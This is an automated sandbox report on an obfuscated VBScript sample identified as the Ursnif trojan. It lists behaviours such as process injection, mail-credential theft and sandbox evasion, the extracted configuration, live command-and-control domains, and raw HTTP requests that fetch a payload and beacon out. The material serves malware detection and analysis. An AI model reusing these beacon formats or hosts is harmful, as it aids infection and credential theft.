Analysis Report 2Q4tLHa5wbO1.vbs

Overview

General Information

Sample Name:	2Q4tLHa5wbO1.vbs
Analysis ID:	321602
MD5:	afa1319ab7c53ec14f6e2b5b403d4d08
SHA1:	1081298acf917fed6ed090c3d5ed642eef9e0f34
SHA256:	7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Deletes itself after installation

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

Uses nslookup.exe to query domains

WScript reads language and country specific registry keys (likely country aware script)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

Avira: detection malicious, Label: TR/Crypt.XDR.Gen

Found malware configuration

Source: explorer.exe.3424.30.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "394", "system": "98b39ff57b4a9bfe82f904932dc722b0", "crc": "602f0", "action": "00000001", "id": "3300", "time": "1606130412", "user": "902d52678695dc15e71ab15cf0142f97", "soft": "1"}

Multi AV Scanner detection for domain / URL

Source: c56.lepini.at	Virustotal: Detection: 12%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

Joe Sandbox ML: detected

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking:

Found Tor onion address

Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses nslookup.exe to query domains

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: RuntimeBroker.exe, 00000020.00000000.821757355.000001B4FAF7D000.00000004.00000001.sdmp	String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/v3jshWKSZC/krn1p7RrW8z3GbGc_/2FFaZK_2BekT/0OtUsmpYx6p/WfQzt4S0Zn457c/1i9HHJRZikaIvJ_2F4Ld0/npT_2Bob9NwfipWw/nUig82mch1FFwH2/1AhxrjhRqExAflhNHx/Cb9luck68/wJ0bPw_2BlEIUsEBoTa7/b3vKAY1TUvvWyKMIerF/bnMrh0BhKsVoIInhXNlnvd/gshefiHtEYuWl/JyEMRLpF/nO3AiIuXH9ihbmxg5VrB2D_/2B1gectVzg/fTJ8Ip_0A_0DE7j3s/GvjWVtZw3Zx0/xpwKnQogZJC/sFRvTTh1zHV/2QqrR8_2B/H HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Nov 2020 11:19:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp	String found in binary or memory: http://api10.lapto
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/
Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at//
Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.826664235.000000000A897000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/s
Source: explorer.exe, 0000001E.00000000.826002988.000000000A68A000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000012.00000003.771957559.000001EFF5CE8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000012.00000003.772095234.000001EFF6021000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsof
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmg
